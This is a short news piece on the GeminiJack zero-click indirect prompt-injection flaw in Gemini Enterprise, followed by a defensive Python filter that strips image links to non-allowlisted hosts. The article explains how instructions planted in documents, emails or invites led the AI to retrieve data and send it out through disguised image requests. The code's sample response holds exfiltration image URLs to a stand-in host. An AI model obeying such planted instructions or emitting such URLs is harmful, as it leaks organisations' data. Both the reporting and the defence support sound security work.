
GeminiJack Zero-Click Vulnerability in Gemini Enterprise Facilitates Corporate Data Breach

GeminiJack zero-click flaw in Gemini Enterprise allowed corporate data exfiltration

On December 11, 2025, Google resolved a critical zero-click vulnerability known as GeminiJack in its Gemini Enterprise platform, which could lead to significant corporate data exfiltration through crafted emails, calendar invites, or documents. Discovered by Noma Security, the flaw allowed attackers to manipulate AI functionality without user interaction and expose sensitive information. By embedding malicious instructions in seemingly benign documents, attackers caused Google’s AI system to search for and retrieve targeted data, which was then exfiltrated via disguised image requests. The incident highlights a new category of AI-native vulnerabilities and the need for heightened security measures within AI-integrated platforms. Although Google has remedied the specific flaw, the report urges ongoing vigilance against indirect prompt injection attacks within retrieval-augmented generation (RAG) systems to protect organizational data effectively. As AI becomes more deeply embedded in enterprise solutions, adapting security strategies is crucial for safeguarding corporate information.
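One defensive control against the image-request exfiltration channel described above is to strip image references to non-allowlisted hosts from assistant output before it is rendered. The following is an added example, not code from Google or Noma Security; the allowlist host, the function names and the sample response are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: the only host the chat renderer may load images from (hypothetical).
ALLOWED_IMAGE_HOSTS = {"static.example-corp.test"}

# Markdown image ![alt](url "title") and HTML <img ... src="url" ...>.
MD_IMG = re.compile(r'!\[[^\]]*\]\(\s*<?([^)\s>]+)>?[^)]*\)')
HTML_IMG = re.compile(r'<img\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)[^>]*>', re.IGNORECASE)


def is_allowed_image(url, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Allow only https URLs whose host exactly matches the allowlist."""
    try:
        parsed = urlparse(url)
        host = parsed.hostname
    except ValueError:  # malformed URL, e.g. a broken IPv6 literal
        return False
    return parsed.scheme == "https" and host in allowed_hosts


def strip_untrusted_images(text, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Return (sanitized_text, blocked_urls) for one assistant response."""
    blocked = []

    def _replace(match):
        url = match.group(1)
        if is_allowed_image(url, allowed_hosts):
            return match.group(0)
        blocked.append(url)  # keep for alerting: a response tried an unapproved host
        return "[image removed]"

    text = MD_IMG.sub(_replace, text)
    text = HTML_IMG.sub(_replace, text)
    return text, blocked


# Constructed sample: an assistant response produced after reading a poisoned document.
SAMPLE_RESPONSE = (
    "Here is the summary you asked for.\n"
    "![logo](https://static.example-corp.test/logo.png)\n"
    "![chart](https://collector.invalid/p.png?d=Q3-budget%3A4.2M)\n"
    '<img src="https://collector.invalid/x.gif?q=payroll">\n'
)

if __name__ == "__main__":
    clean, blocked = strip_untrusted_images(SAMPLE_RESPONSE)
    print(clean)
    print("blocked:", blocked)
```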
